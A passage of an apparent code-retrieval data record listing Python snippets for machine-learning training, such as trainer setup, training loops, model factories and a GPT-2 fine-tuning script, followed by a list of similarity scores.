optimizer,\n dataset,\n count_of_epoch=5,\n batch_size=64,\n callback=None,\n progress=None):\n iterations = range(count_of_epoch)\n\n if progress is not None:\n iterations = progress(iterations)\n\n for it in iterations:\n\n batch_generator = DataLoader(\n dataset=dataset,\n batch_size=batch_size,\n shuffle=True,\n pin_memory=True)\n\n train_epoch(\n \tmodel=model,\n train_generator=batch_generator,\n optimizer=optimizer,\n callback=callback)\n\n return", "def __init__(self, tagger):\n self.tagger = tagger\n self.classifier = Perceptron()", "def train():\n # YOUR TRAINING CODE GOES HERE", "def main(config: DictConfig) -> None:\n\n if config.test:\n # TODO: clean up current working directory with test=true\n experiment_path = os.getcwd().replace(\"test=true,\", \"\").replace(\"test=True,\", \"\")\n if config.unsupervised:\n trainer = UnsupervisedTrainer(config, experiment_path)\n else:\n trainer = Trainer(config, experiment_path)\n summary, report = trainer.test()\n print(summary)\n print(report)\n else:\n experiment_path = os.getcwd()\n if config.unsupervised:\n trainer = UnsupervisedTrainer(config, experiment_path)\n else:\n trainer = 
Trainer(config, experiment_path)\n trainer.run()\n print(\"Launched training. Press CTRL+C to stop.\")\n print(f\"Logs available at {os.getcwd()}\")", "def main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--identifier\", required=True,\n help=\"A short name/identifier for your experiment, e.g. 'ex42b'.\")\n args = parser.parse_args()\n\n train(args)", "def train(self, src, labels): # real signature unknown; restored from __doc__\n pass", "def __init__(\n self,\n hparams: BaselineModel.HParams = None,\n config: Config = None,\n trainer_options: TrainerConfig = None,\n **kwargs,\n ):\n super().__init__(\n hparams=hparams, config=config, trainer_options=trainer_options, **kwargs\n )", "def train(self, transducer, corpus, feat_inst=None):\n pass", "def train(train_dataset: torch.utils.data.Dataset, test_dataset: torch.utils.data.Dataset,\n training_config: dict = train_config, global_config: dict = global_config):\n\n for path in global_config.values():\n create_dirs(path)\n\n # wrap datasets with Dataloader classes\n train_loader = torch.utils.data.DataLoader(train_dataset,\n **training_config[\"DATA_LOADER_CONFIG\"])\n test_loader = torch.utils.data.DataLoader(test_dataset,\n **training_config[\"DATA_LOADER_CONFIG\"])\n\n # model name & paths\n name = \"_\".join([train_config[\"DATE\"], train_config[\"SESSION_NAME\"]])\n modelpath = os.path.join(global_config[\"WEIGHT_DIR\"], name)\n\n # instantiate model\n model = training_config[\"MODEL\"](**training_config[\"MODEL_CONFIG\"])\n\n optimizer = training_config[\"OPTIMIZER\"](model.parameters(),\n **training_config[\"OPTIMIZER_CONFIG\"])\n\n # set up ignite engine\n training_config[\"METRICS\"].update({\"loss\" : Loss(training_config[\"LOSS\"])})\n trainer = create_supervised_trainer(model=model, optimizer=optimizer,\n loss_fn=training_config[\"LOSS\"],\n device=training_config[\"DEVICE\"])\n evaluator = create_supervised_evaluator(model,\n metrics=training_config[\"METRICS\"],\n device=training_config[\"DEVICE\"])\n\n\n # tensorboardX setup\n log_dir = os.path.join(global_config[\"LOG_DIR\"], \"tensorboardx\", name)\n create_dirs(log_dir)\n writer = SummaryWriter(logdir=log_dir)\n\n # log using the logging tool\n logger = log.Log(training_config, run_name=train_config['SESSION_NAME'])\n\n @trainer.on(Events.ITERATION_COMPLETED)\n def log_training(engine):\n iteration = (engine.state.iteration - 1) % len(train_loader) + 1\n writer.add_scalar(\"training/loss\", engine.state.output, engine.state.iteration)\n if iteration % 4 == 0:\n print(\"\\repoch[{}] iteration[{}/{}] loss: {:.2f} \".format(engine.state.epoch,\n iteration, len(train_loader),\n engine.state.output), end=\"\")\n\n # generic evaluation function\n def evaluate(engine, loader):\n evaluator.run(loader)\n metrics = evaluator.state.metrics\n return metrics\n\n # training data metrics\n @trainer.on(Events.EPOCH_COMPLETED)\n def log_training_results(engine):\n print(\"\\ntraining results - epoch {}\".format(engine.state.epoch))\n metrics = evaluate(engine, train_loader)\n print(metrics)\n for key, value in metrics.items():\n logger.log_metric(key, value)\n writer.add_scalar(\"training/avg_{}\".format(key), value, engine.state.epoch)\n\n # test data metrics\n @trainer.on(Events.EPOCH_COMPLETED)\n def log_validation_results(engine):\n print(\"test results - epoch {}\".format(engine.state.epoch))\n metrics = evaluate(engine, test_loader)\n print(metrics)\n for key, value in metrics.items():\n writer.add_scalar(\"validation/avg_{}\".format(key), value, 
engine.state.epoch)\n\n # model checkpointing\n @trainer.on(Events.EPOCH_COMPLETED)\n def model_checkpoint(engine):\n torch.save(model.state_dict(), modelpath + \".pth\")\n print(\"Checkpoint saved to {}\".format(modelpath + \".pth\"))\n\n # training iteration\n try:\n trainer.run(train_loader, max_epochs=training_config[\"EPOCHS\"])\n except KeyboardInterrupt:\n torch.save(model.state_dict(), modelpath + \".pth\")\n print(\"Model saved to {}\".format(modelpath + \".pth\"))\n raise KeyboardInterrupt\n\n # write weights\n torch.save(model.state_dict(), modelpath + \".pth\")\n\n # write csv log file\n log_content = training_config.copy()\n evaluator.run(test_loader)\n log_content[\"VAL_METRICS\"] = evaluator.state.metrics\n log_path = os.path.join(global_config[\"LOG_DIR\"], training_config[\"LOGFILE\"])\n write_log(log_path, log_content)\n\n logger.end_run()\n \n return evaluator.state.metrics[\"training/avg_loss\"]", "def __init__(self,\n model: PreTrainedModel,\n tokenizer: PreTrainedTokenizer,\n optimizer: torch.optim.Optimizer,\n n_epochs: int,\n labels2ind: Dict[str, int],\n scheduler: Optional[torch.optim.lr_scheduler.LambdaLR] = None,\n device: str = 'cpu',\n clipping: Optional[Union[int, float]] = None,\n accumulate_grad_every: int = 1,\n print_every: int = 10,\n print_val_mistakes: bool = False,\n output_dir: str = './'):\n\n self.tokenizer = tokenizer\n self.model = model\n self.optimizer = optimizer\n self.scheduler = scheduler\n self.n_epochs = n_epochs\n self.labels2ind = labels2ind\n self.inds2labels = {v: k for k, v in self.labels2ind.items()}\n self.device = device\n self.clipping = clipping\n self.accumulate_grad_every = accumulate_grad_every\n self.print_every = print_every\n self.print_val_mistakes = print_val_mistakes\n self.output_dir = output_dir\n\n os.makedirs(self.output_dir, exist_ok=True)", "def __init__(self):\n\n # Load the configuration and model using ABSOLUTE PATHS\n self.configuration_file = '/aaio/data/trainer_config.yaml'\n self.model_path = glob.glob('/aaio/data/*/Learner')[0]\n print('model_path', self.model_path)\n\n self.brain = BrainParameters(brain_name='Learner',\n camera_resolutions=[{'height': 84, 'width': 84, 'blackAndWhite': False}],\n num_stacked_vector_observations=1,\n vector_action_descriptions=['', ''],\n vector_action_space_size=[3, 3],\n vector_action_space_type=0, # corresponds to discrete\n vector_observation_space_size=3\n )\n self.trainer_params = yaml.load(open(self.configuration_file))['Learner']\n self.trainer_params['keep_checkpoints'] = 0\n self.trainer_params['model_path'] = self.model_path\n\n self.policy = PPOPolicy(brain=self.brain,\n seed=0,\n trainer_params=self.trainer_params,\n is_training=False,\n load=True)\n self.memory_in = None\n self.use_recurrent = self.trainer_params['model_architecture']['use_recurrent']\n self._arena_map = None\n if self.trainer_params['model_architecture']['architecture'] in ['map', 'wba_prize']:\n self._map_side = self.trainer_params['model_architecture']['map_encoding']['map_side']\n else:\n self._map_side = None", "def register_trainer(cls, to_register=None, *, name: Optional[str] = None):\n # from habitat_baselines.common.base_trainer import BaseTrainer\n from pointnav_vo.rl.common.base_trainer import BaseTrainer\n\n return cls._register_impl(\"trainer\", to_register, name, assert_type=BaseTrainer)", "def train(self, batch_training=False):\n raise NotImplementedError", "def create_inferelator_workflow(regression=RegressionWorkflow, workflow=WorkflowBase):\n\n # Decide which 
preprocessing/postprocessing workflow to use\n # String arguments are parsed for convenience in the run script\n if isinstance(workflow, basestring):\n if workflow == \"base\":\n workflow_class = WorkflowBase\n elif workflow == \"tfa\":\n from inferelator.tfa_workflow import TFAWorkFlow\n workflow_class = TFAWorkFlow\n elif workflow == \"amusr\":\n from inferelator.amusr_workflow import SingleCellMultiTask\n workflow_class = SingleCellMultiTask\n elif workflow == \"single-cell\":\n from inferelator.single_cell_workflow import SingleCellWorkflow\n workflow_class = SingleCellWorkflow\n else:\n raise ValueError(\"{val} is not a string that can be mapped to a workflow class\".format(val=workflow))\n # Or just use a workflow class directly\n elif inspect.isclass(workflow) and issubclass(workflow, WorkflowBase):\n workflow_class = workflow\n else:\n raise ValueError(\"Workflow must be a string that maps to a workflow class or an actual workflow class\")\n\n # Decide which regression workflow to use\n # Return just the workflow if regression is set to None\n if regression is None:\n return workflow_class\n # String arguments are parsed for convenience in the run script\n elif isinstance(regression, basestring):\n if regression == \"bbsr\":\n from inferelator.regression.bbsr_python import BBSRRegressionWorkflow\n regression_class = BBSRRegressionWorkflow\n elif regression == \"elasticnet\":\n from inferelator.regression.elasticnet_python import ElasticNetWorkflow\n regression_class = ElasticNetWorkflow\n elif regression == \"amusr\":\n from inferelator.regression.amusr_regression import AMUSRRegressionWorkflow\n regression_class = AMUSRRegressionWorkflow\n else:\n raise ValueError(\"{val} is not a string that can be mapped to a regression class\".format(val=regression))\n # Or just use a regression class directly\n elif inspect.isclass(regression) and issubclass(regression, RegressionWorkflow):\n regression_class = regression\n else:\n raise ValueError(\"Regression must be a string that maps to a regression class or an actual regression class\")\n\n class RegressWorkflow(regression_class, workflow_class):\n regression_type = regression_class\n\n return RegressWorkflow", "def __init__(self, encoded_network, input_shape, n_classes, batch_size=256,\n log_path=\"./trainer\", variable_scope=\"custom\"):\n super(DefaultNASTrainer, self).__init__(\n encoded_network=encoded_network,\n input_shape=input_shape,\n n_classes=n_classes,\n batch_size=batch_size,\n log_path=log_path,\n variable_scope=variable_scope\n )\n self._set_estimator()", "def main(politician, epochs):\n train_path = f\"..\\\\data\\\\{politician}\\\\training_data.txt\"\n val_path = f\"..\\\\data\\\\{politician}\\\\validation_data.txt\"\n\n tokenizer = AutoTokenizer.from_pretrained(\"anonymous-german-nlp/german-gpt2\")\n\n special_tokens_dict = {\n 'bos_token': '<BOS>',\n 'eos_token': '<EOS>',\n 'pad_token': '<PAD>',\n 'additional_special_tokens': ['<EOQ>']\n }\n tokenizer.add_special_tokens(special_tokens_dict)\n\n train_dataset, test_dataset, data_collator = load_dataset(train_path, val_path, tokenizer)\n\n model = AutoModelWithLMHead.from_pretrained(\"anonymous-german-nlp/german-gpt2\")\n model.resize_token_embeddings(len(tokenizer))\n\n training_args = TrainingArguments(\n output_dir=f\".\\\\output-models\\\\gpt2-{politician}-{epochs}\", # output directory\n overwrite_output_dir=True, # overwrite the content of the output directory\n num_train_epochs=epochs, # number of training epochs\n per_device_train_batch_size=32, # batch size for 
training\n per_device_eval_batch_size=64, # batch size for evaluation\n eval_steps=400, # Number of update steps between two evaluations.\n save_steps=800, # after # steps model is saved\n warmup_steps=500, # number of warmup steps for learning rate scheduler\n )\n\n trainer = Trainer(\n model=model,\n args=training_args,\n data_collator=data_collator,\n train_dataset=train_dataset,\n eval_dataset=test_dataset,\n prediction_loss_only=True,\n )\n\n trainer.train()\n trainer.save_model()", "def train(self):\n return", "def from_config_file(cls, config, copy_config=True):\n\n config = Config.from_file(config)\n trainer = Trainer.from_config(config, copy_config)\n\n return trainer", "def __init__(self, estimator, target_language='java',\n target_method='predict', **kwargs):\n super(SVC, self).__init__(estimator, target_language=target_language,\n target_method=target_method, **kwargs)\n self.estimator = estimator", "def create_nerf(args, return_styles=False):\n if SEED:\n torch.manual_seed(1234)\n\n embed_fn, input_ch = get_embedder(args.multires, args.i_embed)\n\n input_ch_views = 0\n style_dim = args.style_dim\n\n embeddirs_fn = None\n if args.use_viewdirs:\n embeddirs_fn, input_ch_views = get_embedder(args.multires_views, args.i_embed)\n output_ch = 5 if args.N_importance > 0 else 4\n model = NeRF(D_mean=args.D_mean, W_mean=args.W_mean, D_instance=args.D_instance, W_instance=args.W_instance, D_fusion=args.D_fusion, W_fusion=args.W_fusion, D_sigma=args.D_sigma,\n D_rgb=args.D_rgb, W_rgb=args.W_rgb, W_bottleneck=args.W_bottleneck, input_ch=input_ch, output_ch=output_ch, input_ch_views=input_ch_views, style_dim=style_dim,\n embed_dim=args.embed_dim, style_depth=args.style_depth, shared_shape=args.shared_shape, use_viewdirs=args.use_viewdirs, separate_codes=args.separate_codes, use_styles=args.use_styles).to(device)\n\n grad_vars = list(model.parameters())\n\n model_fine = None\n if args.N_importance > 0:\n model_fine = NeRF(D_mean=args.D_mean, W_mean=args.W_mean, D_instance=args.D_instance, W_instance=args.W_instance, D_fusion=args.D_fusion, W_fusion=args.W_fusion, D_sigma=args.D_sigma,\n D_rgb=args.D_rgb, W_rgb=args.W_rgb, W_bottleneck=args.W_bottleneck, input_ch=input_ch, output_ch=output_ch, input_ch_views=input_ch_views, style_dim=style_dim, embed_dim=args.embed_dim, style_depth=args.style_depth, shared_shape=args.shared_shape, use_viewdirs=args.use_viewdirs, separate_codes=args.separate_codes, use_styles=args.use_styles).to(device)\n grad_vars += list(model_fine.parameters())\n\n def network_query_fn(inputs, styles, viewdirs, network_fn, alpha, feature): return run_network(inputs, styles, viewdirs, network_fn, alpha, feature,\n embed_fn=embed_fn,\n embeddirs_fn=embeddirs_fn,\n netchunk=args.netchunk)\n\n # Create optimizer\n optimizer = torch.optim.Adam(params=grad_vars, lr=args.lrate, betas=(0.9, 0.999))\n\n start = 0\n basedir = args.basedir\n expname = args.expname\n\n ##########################\n\n ckpt = load_checkpoint(os.path.join(basedir, expname), args) # Load checkpoints\n if args.load_from is not None:\n print('Loading from', args.load_from)\n ckpt = torch.load(args.load_from)\n\n if ckpt is not None and not args.skip_loading:\n start = ckpt['global_step']\n model.load_state_dict(ckpt['network_fn_state_dict'])\n if model_fine is not None:\n model_fine.load_state_dict(ckpt['network_fine_state_dict'])\n optimizer.load_state_dict(ckpt['optimizer_state_dict'])\n ##########################\n\n render_kwargs_train = {\n 'network_query_fn': network_query_fn,\n 'perturb': 
args.perturb,\n 'perturb_coarse': args.perturb_coarse,\n 'N_importance': args.N_importance,\n 'network_fine': model_fine,\n 'N_samples': args.N_samples,\n 'network_fn': model,\n 'use_viewdirs': args.use_viewdirs,\n 'white_bkgd': args.white_bkgd,\n 'raw_noise_std': args.raw_noise_std,\n }\n\n # NDC only good for LLFF-style forward facing data\n render_kwargs_train['ndc'] = False\n render_kwargs_train['lindisp'] = False\n\n render_kwargs_test = {k: render_kwargs_train[k] for k in render_kwargs_train}\n render_kwargs_test['perturb'] = False\n render_kwargs_test['perturb_coarse'] = False\n render_kwargs_test['raw_noise_std'] = 0.\n\n if return_styles:\n return render_kwargs_train, render_kwargs_test, start, grad_vars, optimizer, ckpt['styles']\n\n return render_kwargs_train, render_kwargs_test, start, grad_vars, optimizer" ]
[ "0.654834", "0.6447384", "0.636751", "0.6288383", "0.61592156", "0.6154132", "0.6132767", "0.6132448", "0.6092635", "0.59407616", "0.59181774", "0.5789498", "0.5706349", "0.5698838", "0.5692006", "0.56582886", "0.5657751", "0.56492114", "0.56327677", "0.56257826", "0.562098", "0.5593179", "0.5586666", "0.5580963", "0.558002", "0.5577944", "0.55727714", "0.55706894", "0.5549665", "0.55483973", "0.5547859", "0.55386436", "0.5531661", "0.553155", "0.551582", "0.5488575", "0.5464366", "0.54613787", "0.5450037", "0.5446642", "0.5442474", "0.54401374", "0.54361796", "0.5431447", "0.5422416", "0.5419983", "0.54150254", "0.54121727", "0.5404032", "0.54025716", "0.5389587", "0.53812426", "0.53715163", "0.5367804", "0.5355616", "0.53453726", "0.5330658", "0.5325996", "0.5325088", "0.53234094", "0.52966994", "0.52957135", "0.52957135", "0.52957135", "0.52957135", "0.52957135", "0.5289821", "0.5289624", "0.52853453", "0.52836406", "0.52836406", "0.5271386", "0.5267138", "0.52666956", "0.5263825", "0.5257126", "0.524936", "0.5247703", "0.52460504", "0.5222929", "0.522189", "0.5195374", "0.51934767", "0.5191596", "0.5188644", "0.51792514", "0.5175902", "0.5155158", "0.51534927", "0.5134928", "0.5134868", "0.51330394", "0.51263547", "0.51260924", "0.5123242", "0.5121133", "0.51192623", "0.5111311", "0.51111126", "0.5108734" ]
0.5852004
11
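The record above closes with a list of similarity scores for its negatives, followed by the positive document's own score (0.5852004) and a small integer (11). A plausible reading, stated here as an assumption since the dump itself does not label these trailing values, is that the integer is the positive document's rank, i.e. the number of negatives that outscore it. The short Python check below reproduces the value from the figures shown above; the variable names are illustrative and not taken from the dataset schema.

# Sanity check (assumption: the trailing integer counts negatives whose score
# exceeds the positive document's score). Only the first twelve scores from the
# list above are reproduced here; the remaining entries in that list are all
# lower than the document's score, so they cannot change the count.
scores_of_negatives = [
    0.654834, 0.6447384, 0.636751, 0.6288383, 0.61592156, 0.6154132,
    0.6132767, 0.6132448, 0.6092635, 0.59407616, 0.59181774, 0.5789498,
]
score_of_document = 0.5852004

rank = sum(s > score_of_document for s in scores_of_negatives)
print(rank)  # prints 11, matching the integer shown at the end of the record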
Factory function for creating an evaluator for supervised segmentation models.
def create_supervised_evaluator( model, prepare_batch, metrics=None, device=None, non_blocking=False, output_transform=val_transform, ): metrics = metrics or {} if device: model.to(device) def _inference(engine, batch): model.eval() with torch.no_grad(): x, y, ids, patch_locations = prepare_batch(batch, device=device, non_blocking=non_blocking) y_pred = model(x) y_pred = _upscale_model_output(y_pred, x) return output_transform(x, y, y_pred, ids, patch_locations) engine = Engine(_inference) for name, metric in metrics.items(): metric.attach(engine, name) return engine
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def build_evaluator(cls, cfg, dataset_name, output_folder=None):\n if output_folder is None:\n output_folder = os.path.join(cfg.OUTPUT_DIR, \"inference\")\n evaluator_list = []\n evaluator_type = MetadataCatalog.get(dataset_name).evaluator_type\n if evaluator_type in [\"sem_seg\", \"coco_panoptic_seg\"]:\n evaluator_list.append(\n SemSegEvaluator(\n dataset_name,\n distributed=True,\n num_classes=cfg.MODEL.SEM_SEG_HEAD.NUM_CLASSES,\n ignore_label=cfg.MODEL.SEM_SEG_HEAD.IGNORE_VALUE,\n output_dir=output_folder,\n )\n )\n if evaluator_type in [\"coco\", \"coco_panoptic_seg\"]:\n evaluator_list.append(COCOEvaluator(dataset_name, cfg, True, output_folder))\n if evaluator_type == \"coco_panoptic_seg\":\n evaluator_list.append(COCOPanopticEvaluator(dataset_name, output_folder))\n if evaluator_type == \"cityscapes_instance\":\n assert (\n torch.cuda.device_count() >= comm.get_rank()\n ), \"CityscapesEvaluator currently do not work with multiple machines.\"\n return CityscapesInstanceEvaluator(dataset_name)\n if evaluator_type == \"cityscapes_sem_seg\":\n assert (\n torch.cuda.device_count() >= comm.get_rank()\n ), \"CityscapesEvaluator currently do not work with multiple machines.\"\n return CityscapesSemSegEvaluator(dataset_name)\n elif evaluator_type == \"pascal_voc\":\n return PascalVOCDetectionEvaluator(dataset_name)\n elif evaluator_type == \"lvis\":\n return LVISEvaluator(dataset_name, cfg, True, output_folder)\n if len(evaluator_list) == 0:\n raise NotImplementedError(\n \"no Evaluator for the dataset {} with the type {}\".format(\n dataset_name, evaluator_type\n )\n )\n elif len(evaluator_list) == 1:\n return evaluator_list[0]\n return DatasetEvaluators(evaluator_list)", "def build_evaluator(cls, cfg, dataset_name, output_folder=None):\n if output_folder is None:\n output_folder = os.path.join(cfg.OUTPUT_DIR, \"inference\")\n evaluator_list = []\n evaluator_type = MetadataCatalog.get(dataset_name).evaluator_type\n if evaluator_type in [\"sem_seg\", \"coco_panoptic_seg\"]:\n evaluator_list.append(\n SemSegEvaluator(\n dataset_name,\n distributed=True,\n num_classes=cfg.MODEL.SEM_SEG_HEAD.NUM_CLASSES,\n ignore_label=cfg.MODEL.SEM_SEG_HEAD.IGNORE_VALUE,\n output_dir=output_folder,\n )\n )\n if evaluator_type in [\"coco\", \"coco_panoptic_seg\"]:\n evaluator_list.append(COCOEvaluator(dataset_name, cfg, True, output_folder))\n if evaluator_type == \"coco_panoptic_seg\":\n evaluator_list.append(COCOPanopticEvaluator(dataset_name, output_folder))\n if evaluator_type == \"cityscapes_instance\":\n assert (\n torch.cuda.device_count() >= comm.get_rank()\n ), \"CityscapesEvaluator currently do not work with multiple machines.\"\n return CityscapesInstanceEvaluator(dataset_name)\n if evaluator_type == \"cityscapes_sem_seg\":\n assert (\n torch.cuda.device_count() >= comm.get_rank()\n ), \"CityscapesEvaluator currently do not work with multiple machines.\"\n return CityscapesSemSegEvaluator(dataset_name)\n elif evaluator_type == \"pascal_voc\":\n return PascalVOCDetectionEvaluator(dataset_name)\n elif evaluator_type == \"lvis\":\n return LVISEvaluator(dataset_name, cfg, True, output_folder)\n if len(evaluator_list) == 0:\n raise NotImplementedError(\n \"no Evaluator for the dataset {} with the type {}\".format(\n dataset_name, evaluator_type\n )\n )\n elif len(evaluator_list) == 1:\n return evaluator_list[0]\n return DatasetEvaluators(evaluator_list)", "def build_evaluator(cls, cfg, dataset_name, output_folder=None):\n if output_folder is None:\n output_folder = os.path.join(cfg.OUTPUT_DIR, 
\"inference\")\n evaluator_list = []\n evaluator_type = MetadataCatalog.get(dataset_name).evaluator_type\n if evaluator_type == \"sem_seg\":\n return SemSegEvaluator(\n dataset_name,\n distributed=True,\n output_dir=output_folder,\n num_classes=4,\n ignore_label=255\n )\n if evaluator_type == \"cityscapes_sem_seg\":\n assert (\n torch.cuda.device_count() >= comm.get_rank()\n ), \"CityscapesEvaluator currently do not work with multiple machines.\"\n return CityscapesSemSegEvaluator(dataset_name)\n if len(evaluator_list) == 0:\n raise NotImplementedError(\n \"no Evaluator for the dataset {} with the type {}\".format(\n dataset_name, evaluator_type\n )\n )\n if len(evaluator_list) == 1:\n return evaluator_list[0]\n return DatasetEvaluators(evaluator_list)", "def build_evaluator(cls, cfg, dataset_name, output_folder=None):\n if output_folder is None:\n output_folder = os.path.join(cfg.OUTPUT_DIR, \"inference\")\n evaluator_list = []\n evaluator_type = MetadataCatalog.get(dataset_name).evaluator_type\n if evaluator_type in [\"coco\", \"coco_panoptic_seg\"]:\n evaluator_list.append(COCOEvaluator(dataset_name, cfg, True, output_folder))\n if len(evaluator_list) == 0:\n raise NotImplementedError(\n \"no Evaluator for the dataset {} with the type {}\".format(\n dataset_name, evaluator_type\n )\n )\n if len(evaluator_list) == 1:\n return evaluator_list[0]\n return DatasetEvaluators(evaluator_list)", "def build_evaluator(cfg: CfgNode) -> EvaluatorBase:\n name = cfg[\"name\"]\n evaluator = simple_build(name, cfg, EVALUATORS)\n return evaluator", "def evaluator(test_config: TestConfig, criterion: nn.Module, model: nn.Module,\n device: torch.device) -> Engine:\n metrics, eval_metric, *_ = test_config\n metrics['loss'] = Loss(criterion,\n output_transform=lambda data: (data[0], data[1]))\n val_evaluator = create_supervised_evaluator(model, metrics, device,\n prepare_batch=prepare_batch)\n return val_evaluator", "def sub_evaluator(self, ast: lark.Tree) -> 'Evaluator':\n return Evaluator(ast, activation=self.activation, functions=self.functions)", "def _create_evaluators(self):\n pass", "def custom_build_evaluator(cls, cfg, dataset_name, dataset, output_folder=None):\n dump_train = cfg.GLOBAL.DUMP_TRAIN\n return build_evaluator(cfg, dataset_name, dataset, output_folder, dump=dump_train)", "def clf_eval():\n y_true = np.random.randint(2, size=10000)\n y_pred = np.clip(np.random.normal(0.25, 0.3, size=y_true.shape) + y_true * 0.5, 0, 1)\n\n model_eval = ClassificationEvaluation(\n y_true=y_true,\n y_pred=y_pred,\n class_names=['a', 'b'],\n model_name='foo',\n )\n return model_eval", "def evaluator(evaluate):\r\n @functools.wraps(evaluate)\r\n def ecspy_evaluator(candidates, args):\r\n fitness = []\r\n for candidate in candidates:\r\n fitness.append(evaluate(candidate, args))\r\n return fitness\r\n ecspy_evaluator.single_evaluation = evaluate\r\n return ecspy_evaluator", "def evaluator(self, candidates, args):\n\t\traise NotImplementedError", "def specific_evaluator(self, evaluator: Path, bundle: Bundle):\n pass", "def evaluator(self, candidates, args):\r\n raise NotImplementedError", "def create_multi_node_evaluator(actual_evaluator, communicator):\n\n actual_evaluator._mn_original_evaluate = actual_evaluator.evaluate\n actual_evaluator._mn_communicator = communicator\n\n def new_evaluate(self):\n local_mean_dict = self._mn_original_evaluate()\n global_mean_dict = {\n name:\n self._mn_communicator.allreduce_obj(\n value) / self._mn_communicator.size\n for name, value in sorted(local_mean_dict.items())\n }\n 
return global_mean_dict\n\n actual_evaluator.evaluate = six.create_bound_method(\n new_evaluate, actual_evaluator)\n return actual_evaluator", "def eval(self):\n dataset = self.config.dataset\n class_config = dataset.class_config\n # it might make sense to make excluded_groups a field in an EvalConfig\n # in the future\n excluded_groups = ['train_scenes']\n\n scene_id_to_cfg = {s.id: s for s in dataset.all_scenes}\n\n @lru_cache(maxsize=len(dataset.all_scenes))\n def build_scene(scene_id: str) -> Scene:\n cfg = scene_id_to_cfg[scene_id]\n scene = cfg.build(\n class_config, self.tmp_dir, use_transformers=True)\n return scene\n\n # build and run each EvaluatorConfig for each scene group\n for e in self.config.evaluators:\n for group_name, group_ids in dataset.scene_groups.items():\n if group_name in excluded_groups:\n continue\n if len(group_ids) == 0:\n log.info(f'Skipping scene group \"{group_name}\". '\n 'Empty scene group.')\n continue\n group_scenes = (build_scene(id) for id in group_ids)\n evaluator = e.build(\n class_config, scene_group=(group_name, group_scenes))\n\n log.info(f'Running {type(evaluator).__name__} on '\n f'scene group \"{group_name}\"...')\n try:\n evaluator.process(group_scenes, self.tmp_dir)\n except FileNotFoundError:\n log.warn(f'Skipping scene group \"{group_name}\". '\n 'Either labels or predictions are missing for '\n 'some scene.')", "def evaluator(self, evaluator):\n self.__evaluator = evaluator", "def make_eval_step(self):\n def eval_step(model, example):\n with flax.deprecated.nn.stateful() as state:\n logits = model(example, train=False)\n if self.info.supervised_keys[-1] == 'error_type':\n targets = example['error_type'][:, None]\n else:\n targets = example['target_output']\n state = {k: v['tag'] for k, v in state.as_dict().items()}\n return self.compute_metrics(logits, targets, None), logits, state\n\n return eval_step", "def evaluator(self):\n return self.__evaluator", "def define_estimator(mode, features, labels, model_fn, config, params):\r\n\r\n assert mode in _ALLOWED_MODES, (\r\n 'mode should be TRAIN, EVAL or PREDICT from tf.estimator.ModeKeys.')\r\n assert params.name_feature_extractor in {'resnet_v1_50', 'resnet_v1_101'}, (\r\n 'params must have name_feature_extractor attribute in resnet_v1_{50,101}.')\r\n if params.name_feature_extractor == 'resnet_v1_101':\r\n raise NotImplementedError(\r\n 'Use of resnet_v1_101 as base feature extractor is not yet implemented.')\r\n\r\n # unpack features\r\n rawimages = features['rawimages'] if 'rawimages' in features.keys() else None\r\n rawimagespaths = features['rawimagespaths'] if 'rawimagespaths' in features.keys() else None\r\n proimages = features['proimages']\r\n prolabels = labels if labels else None\r\n\r\n ## build a fully convolutional model for semantic segmentation\r\n # predictions refer to the training class ids\r\n # for plotting of results (inference) or assessment, predictions should be transformed\r\n # using `{inference, evaluation}_problem_def`s\r\n _, _, predictions = model_fn(mode, proimages, prolabels, config, params)\r\n\r\n # TODO(panos): assert that proimages and predictions have same spatial size\r\n\r\n if mode == tf.estimator.ModeKeys.TRAIN:\r\n\r\n # global step\r\n global_step = tf.train.get_or_create_global_step()\r\n\r\n # losses\r\n with tf.variable_scope('losses'):\r\n losses = define_losses(mode, predictions, prolabels, config, params)\r\n\r\n # exponential moving averages\r\n # creates variables in checkpoint with name: 'emas/' + <variable_name> +\r\n # 
{'ExponentialMovingAverage,Momentum}\r\n # ex.: for 'classifier/logits/Conv/biases' it saves also\r\n # 'emas/classifier/logits/Conv/biases/ExponentialMovingAverage'\r\n # and 'emas/classifier/logits/Conv/biases/Momentum'\r\n # create_train_op guarantees to run GraphKeys.UPDATE_OPS collection\r\n # before total_loss in every step, but doesn't give any guarantee\r\n # for running after some other op, and since ema need to be run\r\n # after applying the gradients maybe this code needs checking\r\n if params.ema_decay > 0:\r\n with tf.variable_scope('exponential_moving_averages'):\r\n #for mv in slim.get_model_variables():\r\n # print('slim.model_vars:', mv.op.name)\r\n ema = tf.train.ExponentialMovingAverage(params.ema_decay,\r\n num_updates=global_step,\r\n zero_debias=True)\r\n variables_to_ema = []\r\n for mv in tf.model_variables():\r\n if 'BatchNorm/moving' not in mv.name:\r\n variables_to_ema.append(mv)\r\n print(\r\n f\"\\nFound {len(tf.model_variables())} variables, saving exponential \"\r\n f\"moving averages for {len(variables_to_ema)} of them.\\n\")\r\n maintain_ema_op = ema.apply(var_list=variables_to_ema)\r\n tf.add_to_collection(tf.GraphKeys.UPDATE_OPS, maintain_ema_op)\r\n\r\n # create training operation\r\n with tf.variable_scope('train_ops'):\r\n\r\n # optimizer\r\n optimizer = define_optimizer(global_step, params)\r\n\r\n # training op\r\n train_op = create_train_op(\r\n losses['total'],\r\n optimizer,\r\n global_step=global_step,\r\n # update_ops=tf.get_collection(tf.GraphKeys.UPDATE_OPS),\r\n summarize_gradients=False,\r\n # transform_grads_fn=,\r\n # gradient_multipliers=gradient_multipliers,\r\n check_numerics=False,\r\n )\r\n\r\n # TODO: maybe parameterize it\r\n training_hooks = [\r\n _RunMetadataHook(params.log_dir,\r\n every_n_iter=max(params.num_training_steps//50,\r\n params.save_checkpoints_steps))]\r\n\r\n # next two lines were added for distributed debugging\r\n if params.distribute:\r\n tower_context = tf.contrib.distribute.get_tower_context()\r\n assert tower_context\r\n print(f\"Tower {tower_context.tower_id}: _RunMetadataHook is not supported \"\r\n \"yet for distributed training.\")\r\n training_hooks = []\r\n\r\n replace_initializers(config, params)\r\n\r\n summaries_data = {'features': features,\r\n 'labels': labels,\r\n 'predictions': predictions,\r\n 'losses': losses,\r\n 'learning_rate': optimizer._learning_rate} #pylint: disable=protected-access\r\n\r\n scaffold = _define_scaffold(mode, config, params, summaries_data)\r\n estimator_spec = tf.estimator.EstimatorSpec(mode,\r\n predictions=predictions,\r\n loss=losses['total'],\r\n train_op=train_op,\r\n training_hooks=training_hooks,\r\n scaffold=scaffold)\r\n\r\n if mode == 